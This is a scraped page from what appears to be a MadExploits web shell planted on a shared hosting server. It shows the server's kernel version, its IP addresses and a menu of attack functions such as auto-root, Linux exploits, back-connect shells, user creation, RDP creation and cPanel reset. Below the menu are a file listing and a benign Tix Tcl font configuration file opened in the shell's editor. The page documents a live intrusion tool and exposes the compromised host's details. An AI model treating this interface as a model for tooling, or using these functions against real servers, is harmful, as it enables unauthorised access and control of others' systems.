Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
lib64 /
tcl8.6 /
Tix8.4.3 /
pref /
[ HOME SHELL ]
Name
Size
Permission
Action
10Point.fs
641
B
-rw-r--r--
10Point.fsc
2
KB
-rw-r--r--
12Point.fs
640
B
-rw-r--r--
12Point.fsc
2
KB
-rw-r--r--
14Point.fs
639
B
-rw-r--r--
14Point.fsc
2.06
KB
-rw-r--r--
Bisque.cs
1
KB
-rw-r--r--
Bisque.csc
22.01
KB
-rw-r--r--
Blue.cs
1.02
KB
-rw-r--r--
Blue.csc
22.02
KB
-rw-r--r--
Gray.cs
1.02
KB
-rw-r--r--
Gray.csc
22.02
KB
-rw-r--r--
Old12Pt.fs
541
B
-rw-r--r--
Old14Pt.fs
499
B
-rw-r--r--
SGIGray.cs
1
KB
-rw-r--r--
SGIGray.csc
22.01
KB
-rw-r--r--
TK.cs
1
KB
-rw-r--r--
TK.csc
1.98
KB
-rw-r--r--
TK.fs
506
B
-rw-r--r--
TK.fsc
569
B
-rw-r--r--
TixGray.cs
1
KB
-rw-r--r--
TixGray.csc
22.01
KB
-rw-r--r--
TkWin.cs
2.19
KB
-rw-r--r--
TkWin.csc
21.78
KB
-rw-r--r--
TkWin.fs
390
B
-rw-r--r--
TkWin.fsc
1.63
KB
-rw-r--r--
WmDefault.cs
1.42
KB
-rw-r--r--
WmDefault.csc
14.22
KB
-rw-r--r--
WmDefault.fs
755
B
-rw-r--r--
WmDefault.fsc
2.13
KB
-rw-r--r--
WmDefault.py
3.42
KB
-rw-r--r--
WmDefault.tcl
33.05
KB
-rw-r--r--
WmDefault.txt
4.22
KB
-rw-r--r--
pkgIndex.tcl
262
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 12Point.fsc
# # $Id: 12Point.fsc,v 1.2 2001/12/09 05:03:09 idiscovery Exp $ # proc tixPref:InitFontSet:12Point {} { global tixOption tcl_platform switch -- $tcl_platform(platform) "windows" { # This should be Tahoma for Win2000/XP set font "MS Sans Serif" set fixedfont "Courier New" } unix { set font "helvetica" set fixedfont "courier" } set tixOption(font) [list $font -12] set tixOption(bold_font) [list $font -12 bold] set tixOption(menu_font) [list $font -12] set tixOption(italic_font) [list $font -12 bold italic] set tixOption(fixed_font) [list $fixedfont -12] set tixOption(border1) 1 } proc tixPref:SetFontSet:12Point {} { global tixOption option add *Font $tixOption(font) $tixOption(prioLevel) option add *font $tixOption(font) $tixOption(prioLevel) option add *Menu.font $tixOption(menu_font) $tixOption(prioLevel) option add *TixMenu.font $tixOption(menu_font) $tixOption(prioLevel) option add *Menubutton.font $tixOption(menu_font) $tixOption(prioLevel) option add *Label.font $tixOption(bold_font) $tixOption(prioLevel) option add *Scale.font $tixOption(italic_font) $tixOption(prioLevel) option add *TixBalloon*Label.font $tixOption(font) $tixOption(prioLevel) option add *TixBitmapButton*label.font $tixOption(font) $tixOption(prioLevel) option add *TixControl*label.font $tixOption(bold_font) $tixOption(prioLevel) option add *TixLabelEntry*label.font $tixOption(bold_font) $tixOption(prioLevel) option add *TixLabelFrame*label.font $tixOption(bold_font) $tixOption(prioLevel) option add *TixMwmClient*title.font $tixOption(menu_font) $tixOption(prioLevel) option add *TixNoteBook.nbframe.font $tixOption(menu_font) $tixOption(prioLevel) option add *TixOptionMenu*menubutton.font $tixOption(font) $tixOption(prioLevel) option add *TixComboBox*Entry.font $tixOption(font) $tixOption(prioLevel) option add *TixFileSelectBox*Label.font $tixOption(bold_font) $tixOption(prioLevel) }
Close